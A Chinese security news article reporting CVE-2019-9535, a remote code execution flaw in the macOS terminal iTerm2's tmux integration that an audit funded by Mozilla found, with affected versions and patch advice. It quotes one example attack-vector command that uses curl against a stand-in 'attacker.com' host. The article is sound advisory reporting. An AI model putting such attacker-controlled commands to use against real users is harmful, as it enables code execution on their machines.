freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
FreeBuf+小程序

FreeBuf+小程序

官方公众号企业安全新浪微博

国内领先的互联网安全新媒体,同时也是爱好者们交流与分享安全技术的社区

Mac终端利器iTerm2被曝严重的RCE漏洞,至少已存在7年
2019-10-10 17:48:50

由 Mozilla 开源支持计划 (MOSS) 资助、网络安全公司 Radically Open Security (ROS) 开展的一次独立安全审计结果显示, iTerm 2 中存在一个严重的远程代码执行 (RCE) 漏洞,且至少已存在7年。

iTerm 2 简介

iTerm2 是全球最热门的终端模拟器之一,是开发人员经常使用的 MacOS 终端工具,是 Mac 内置终端 app 最有力的热门开源工具替代品之一,被很多开发人员称为“Mac 终端利器”。

0_dSvJ3y6l1ZFqhafG.jpg

MOSS 计划选择 iTerm2 进行安全审计的原因在于它处理不受信任的数据且其使用范围广泛,用户包括高风险目标如开发人员和系统管理员。

漏洞概述

该漏洞的CVE 编号是CVE-2019-9535。

在审计过程中,ROS 在iTerm2 的 tmux集成功能中找到了一个至少已存在7年之久的严重漏洞。攻击者如能生成终端输出,则在很多情况下能够在用户计算机上执行命令。这种攻击向量的例子是连接到由攻击者控制的 SSH 服务器或者命令如curl http://attacker.com and tail -f /var/log/apache2/referer_log。

开发人员George Nachman 指出,“审计发现某个问题在收到一定的输入后会导致 iTerm2 发出命令。这个问题非常严重,因为在某些情况下,当用户查看文件或者接收在 iTerm2 构造的输入时,攻击者就能够在用户机器上执行代码。”

Nachman 认为该漏洞影响的iTerm2 用户数量介于10万至20万之间。

Mozilla 公司的安全工程师 Tom Ritter 指出,这个漏洞源自 iTerm2 中的 tmux 集成功能。Tumx 应用程序是一款终端多路复用器,可允许从单个设备创建并控制多个终端。

CERT 协调中心发布漏洞通知表示,可通过使用命令行工具在终端屏幕上打印由攻击者控制的内容,从而利用该漏洞。该中心指出,“潜在的攻击向量包括通过 ssh 连接至恶意服务器,通过curl 获取恶意网站,或者通过 tail –f 跟踪包含某些恶意内容的日志文件。”

如下是模拟受害者机器连接到恶意 SSH 服务器之后,在机器上执行命令的 PoC 视频。在这个案例中,只打开一个计算器作为其它更具恶意的命令的占位符。


一般情况下,该漏洞需要某些用户交互或伎俩才能遭触发,但由于它可通过通常被认为是安全的命令利用,因此它的潜在影响力巨大。

影响版本

该漏洞影响于本周早些时候发布的 3.3.5 版本及之前版本。

修复方案

Screen-Shot-2019-10-08-at-2.18.36-PM.png

目前补丁已发布但自动更新尚未推送,建议用户立即在 iTerm2 目录中选择“检查新版本”手动更新至最新版本 3.3.6。

*参考来源:MozillaTheRegister,由代码卫士编译,转载请注明来自FreeBuf.COM

本文作者:, 转载请注明来自FreeBuf.COM

# mac # 终端 # RCE漏洞 # iTerm2
被以下专栏收录,发现更多精彩内容
+ 收入我的专栏
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦